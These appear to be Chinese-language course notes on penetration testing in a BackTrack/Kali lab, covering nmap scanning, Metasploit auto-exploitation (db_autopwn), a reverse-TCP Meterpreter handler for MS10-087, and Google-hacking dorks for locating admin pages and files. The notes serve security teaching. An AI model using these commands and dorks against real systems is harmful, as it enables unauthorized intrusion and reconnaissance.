meterpreter 命令行版本的冰河工具
是metasploit中的一个模块
内存注入方式
l0phtcrack容笑 计算机密码破解软件
meterpreter 命令行版本的冰河工具
是metasploit中的一个模块
内存注入方式
l0phtcrack容笑 计算机密码破解软件
db_nmap -T aggressive -sV -n -O -v 10.10.10.130
msf调用 nmap,扫描主机 ,并将扫描的内容存储进入数据库
-T Aggressive:采用最快的时间扫描
-sV:判断提供的服务和软件版本
-n:不做DNS解析,提高速度
-v:显示扫描结果
hosts 查看扫描到的主机
services 描到的服务
db_autopwn -t -p -e -i 10.10.10.130
自动攻击,加载攻击模块正对服务漏洞进行攻击 -t 显示所有模块 -p 加载模块攻击 -e执行攻击 -i 指定刚扫描的主机
猪猪侠乌云 带头大哥 路人甲
msfconsole
kali linux:操作系统/backtrack 5
SET:社会工程学套件
nmap :端口扫描器
nessus:开源漏洞扫描器
meterpreter:后渗透攻击软件
ettercap中间人攻击
msfpayload 做后门程序的命令
打开监听回话:user exploit/multi/handler (监听模块)
payload windows/meterpreter/reverse_tcp
微软技术中心: MS10-087
大神分享攻击代码:https://www.exploit-db.com/exploits/43338
微软安全技术中心:technet.microsoft.com/zh-cn
show targets (显示该模块可以攻击的系统及其型号)
set target 3(编号为你选择的攻击的操作系统型号)
扫描用run
攻击用exploit
man nmap 帮助
nmap IP或者一个域名
nmap -A 综合扫描 一般正对指定网站扫描
autoscan 图形化界面扫描器
nmap -o IP 扫指定IP的系统信息
xprobe2 ip
set rhosts:设置对方的IP地址或者范围
set shost 设置自己的IP地址
set smac 设置自己的局域网地址
set interface:设置接口
set threads:可以设置线程
万能扫描器 NMAP
ZENNAP 图形化界面nmap
地址:nmap.org
全球渗透工具排行:sectools.org
nmap ip/24
主机扫描 IP 端口 操作系统 漏洞扫描
主机扫描 PING
Nmap最出名的扫IP扫端口扫描工具
nmap -o 扫描目标操作系统
shodan 综合扫描
nessus 目前最优秀的漏洞扫描软件
OpenVAS 以nessus 衍生出来的新品 两者源码一样
乌云:http://www.wooyun.org
黑客与极客:http://www.freebuf.com
91安全攻防指南:https://www.91ri.org
360补天:http://loudong.360.cn
搜索引擎:google hacking shodan(黑暗搜索引擎) bing 谷粉搜搜gfsoso.bbao.top
检索特定类型的文件:site:testfire.net filetype.xls parent directory site:testfire.net site:testfire.net
搜索指定网址的指定类型文件site:51cto.com filetype:doc
搜索指定网站的跟目录信息:parent directory site:51cto.com
管理员后台搜索:site:51cto.com inurl:admin或login
搜索关键字:https://www.exploit-db.com/google-hacking-database 大神整理出来的
inurl intext site filetype
搜索引擎:google bing gllgle shodan
shois 查询网站的法人,邮箱 电话 域名信息 whois testfire.net
whois pinginglab.net
IP信息查询:site.ip138.com 有地理位置 域名在哪注册 邮箱 电话
也可以通过 icp备案查询其他信息
cmd命令行:nslookup 查询域名IP地
埃文:www.ipplus360.com IP高度定位 IP查询
ipipnet ip.cn ip138 ipplus360 maxmind.com
三个虚拟机 BT5 黑客
网络服务器 WEB
后台服务器 win2k3
攻击机 需要内存大一些至少1GB
其他的则可以少一些
back track5 BT5 刚进去是命令行
startx 启动图形化界面
命令行使用:ifconfig 获取IP
如果没有IP地址,可以手动修改:命令如下:ifconfig eth0 10.10.10.132 netmask 255.255.255.0 up
kali linux 操作系统 先操作系统
黑盒测试
白盒测试
灰盒测试
前期交互阶段
情报搜集阶段
危险建模阶段
渗透攻击阶段 后渗透攻击阶段
漏洞分析与利用 安全漏洞的生命周期
安全漏洞研究与挖掘
exploit 代码开发与测试 sq1sq2sq3
cnnvd cnvd 乌云安全报告漏洞平台
360补天
metasploit 渗透测试
图片木马 word木马
漏洞扫描 事前防御